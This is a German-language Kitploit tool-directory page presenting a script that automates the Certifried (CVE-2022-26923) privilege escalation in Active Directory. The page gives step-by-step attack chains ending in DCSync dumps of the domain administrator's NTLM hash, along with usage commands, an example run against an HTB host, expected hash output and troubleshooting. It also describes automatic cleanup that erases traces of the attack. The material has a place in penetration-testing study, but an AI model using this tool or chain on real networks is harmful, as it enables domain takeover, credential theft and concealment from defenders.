Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-26923 — Automatisierte CVE-2022-26923-Ausnutzung (Certifried) | Kitploit
Tools/GitHubGitHub/nefhara/cve-2022-26923
Privilege EscalationSchwachstellenanalyseExploitationPost-ExploitationCTFPenetrationstestsAuthentifizierungLernen & BildungLabs & Praxis
GitHubnefhara/cve-2022-26923

CVE-2022-26923

Automatisierte CVE-2022-26923-Ausnutzung (Certifried)

2vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

CVE-2022-26923 – Certifried Exploit (AD CS Missbrauch)

Automatisierte Ausnutzung von CVE-2022-26923 (Certifried), die eine Privilegienausweitung durch Missbrauch von Active Directory Certificate Services (AD CS) ermöglicht, mit einem automatischen Fallback auf Resource-Based Constrained Delegation (RBCD), die schließlich den NTLM-Hash eines Domänenadministratorkontos extrahiert.

⚠️ Nur für Bildungszwecke / Labor / CTF

Nicht in unbefugten Umgebungen verwenden.


🎯 Beschreibung

Dieses Skript automatisiert die folgende Angriffskette:

Methode 1 — Klassisch (direkte CVE-Ausnutzung)

  1. Erstellen eines kontrollierten Maschinenkontos (zufälliger Name, um Konflikte zu vermeiden)
  2. Spoofen des dNSHostName-Attributs, um es dem Domain Controller anzupassen
  3. Anfordern eines Maschinenzertifikats über AD CS
  4. Authentifizierung mit dem Zertifikat → Extrahieren des NTLM-Hashes des DC über PKINIT
  5. Durchführen eines DCSync-Angriffs mit secretsdump.py unter Verwendung des DC-Hashes

Methode 2 — Fallback (RBCD) (automatisch, wenn Methode 1 fehlschlägt)

  1. Konvertieren von PFX in PEM zur Verwendung mit bloodyAD
  2. Konfigurieren von Resource-Based Constrained Delegation (RBCD) auf dem DC
  3. Hinzufügen eines SPN zum kompromittierten Maschinenkonto über impacket-addspn
  4. Anfordern eines S4U2Self + S4U2Proxy-Tickets mit getST.py
  5. Dumpen des NTLM-Hashes über secretsdump.py mit dem Kerberos-Ticket

🔗 Verwundbarkeit

  • CVE-2022-26923 – "Certifried" — CVSS 8.8 (Hoch)
  • Betrifft Active Directory-Umgebungen, die AD CS ausführen
  • Erlaubt einem Benutzer mit niedrigen Berechtigungen, sich als Domain Controller auszugeben, indem das dNSHostName-Attribut manipuliert wird, wodurch die CA ein Zertifikat für das DC-Konto ausstellt

🛠 Verwendete Werkzeuge


📦 Abhängigkeiten installieren

root@kitploit:~
pipx install impacket
pipx install certipy-ad
pipx install bloodyad
sudo apt install openssl

🚀 Verwendung

root@kitploit:~
chmod +x CVE-2022-26923.sh
./CVE-2022-26923.sh [options]

Verfügbare Optionen

root@kitploit:~
-d, --dc-ip     IP-Adresse des Domain Controllers
-D, --domain    Domänenname (z.B. corp.local)
-u, --user      Gültiger Domänenbenutzer (UPN-Format: benutzer@domäne)
-p, --pass      Benutzerpasswort
--verbose       Debug-Modus: alle ausgeführten Befehle anzeigen
-h, --help      Diese Hilfemeldung anzeigen

🧠 Beispiel (HTB Certifried)

root@kitploit:~
./CVE-2022-26923.sh \
  -d 10.129.227.189 \
  -D certifried.htb \
  -u [email protected] \
  -p 'Ch4ng3m3!' \
  --verbose

Tipp: Vor dem Ausführen den genauen CA-Namen und die Vorlage identifizieren mit:

root@kitploit:~
certipy-ad find -u 'user@domain' -p 'Password' -target dc.domain -ns <DC_IP> -stdout

Dann CA_NAME und TEMPLATE in den Skript-Standardwerten entsprechend aktualisieren.


🔥 Erwartete Ausgabe

Abhängig von der Umgebung wird einer von zwei Pfaden erfolgreich sein:

Methode 1 (Klassisch):

root@kitploit:~
[5] Classic authentication attempt (Recovering DC hash)...    [SUCCESS]
[+] NTLM Hash of the Domain Controller recovered: aad3b435b51404eeaad3b435b51404ee:6f9d...

[6] DCSync of administrator via secretsdump...
administrator:500:aad3b435...:<nthash>:::

Methode 2 (RBCD Fallback):

root@kitploit:~
[5] Classic authentication attempt (Recovering DC hash)...    [FAILED]
[*] Switching to Fallback method (RBCD + SPN)...

[Fallback-5] Running secretsdump via RBCD ticket...
administrator:500:aad3b435...:<nthash>:::

OPSEC-Bereinigung läuft automatisch am Ende (oder bei Strg+C):

root@kitploit:~
[*] Starting trace cleanup (OPSEC)...
    [OK] Cleanup complete.

🏗 Interner Angriffsablauf

root@kitploit:~
Zufällige Maschinenkontoerstellung (z.B. PWN8472$)
              ↓
    dNSHostName-Spoofing → dc.domain.local
              ↓
  Dynamische LDAP-Sync-Überprüfung (Polling)
              ↓
  Zertifikatsanforderung über RPC (Maschinenvorlage)
    [NETBIOS-Timeout automatischer Wiederholungsversuch bis zu 5x]
              ↓
┌─────────────────────────────────────────┐
│         METHODE 1 — KLASSISCH           │
│   certipy-ad auth -pfx dc.pfx           │
│   → DC-NTLM-Hash über PKINIT            │
│   → DCSync über secretsdump             │
└────────────────┬────────────────────────┘
                 │ [FAILS]
                 ▼
┌─────────────────────────────────────────┐
│         METHODE 2 — RBCD FALLBACK       │
│   PFX → PEM-Konvertierung (openssl)     │
│   bloodyAD: add rbcd dc$ COMP$          │
│   impacket-addspn: SPN auf COMP$        │
│   getST: S4U2Self + S4U2Proxy (cifs/)   │
│   secretsdump über KRB5-Ticket          │
└─────────────────────────────────────────┘
              ↓
 OPSEC-Bereinigung (trap EXIT/INT/TERM)
   - RBCD-Attribut auf DC entfernen
   - Maschinenkonto (COMP$) löschen
   - Lokale PFX-/PEM-/ccache-Dateien löschen

🔧 Bekannte Probleme und Fehlerbehebung


⚠️ Haftungsausschluss

Dieses Projekt wird bereitgestellt für:

  • Bildungs- und Forschungszwecke
  • Persönliche Laborumgebungen
  • CTF / HackTheBox / Capture-The-Flag-Herausforderungen
  • Autorisierte Penetrationstests (mit schriftlicher Genehmigung)

Der Autor übernimmt keine Haftung für unbefugte oder illegale Nutzung dieses Werkzeugs.

Tool herunterladen
WerkzeugZweck
certipy-adKontoerstellung/-aktualisierung, Zertifikatsanforderung, PKINIT-Authentifizierung
bloodyADRBCD-Attributmanipulation (Fallback)
impacket-addspnSPN-Hinzufügung auf dem Maschinenkonto (Fallback)
impacket-getSTS4U2Self + S4U2Proxy-Ticketanforderung (Fallback)
impacket-secretsdumpDCSync / NTLM-Hash-Dump
opensslPFX → PEM-Konvertierung (Fallback)
SymptomUrsacheLösung
NETBIOS connection timed outAD CS RPC-Verzögerung auf HTBWird automatisch behandelt (5 Wiederholungen)
KDC_ERR_BADOPTION bei getSTFehlender SPN auf COMP$Skript verwendet jetzt impacket-addspn vor getST
KDC_ERR_WRONG_REALM bei secretsdumpFalscher SPN (LDAP vs cifs)Skript verwendet cifs/ SPN für getST
Clock skew too greatKerberos-Zeitversatzsudo ntpdate <DC_IP> vor dem Ausführen
Löschen des Maschinenkontos fehlschlägtUnzureichende AD-Rechte (normal)Skript ignoriert graceful mit `
unrecognized arguments mit certipy-adFalsche Syntax (altes certipy-Format)Skript verwendet explizite Flags -u/-p/-target-ip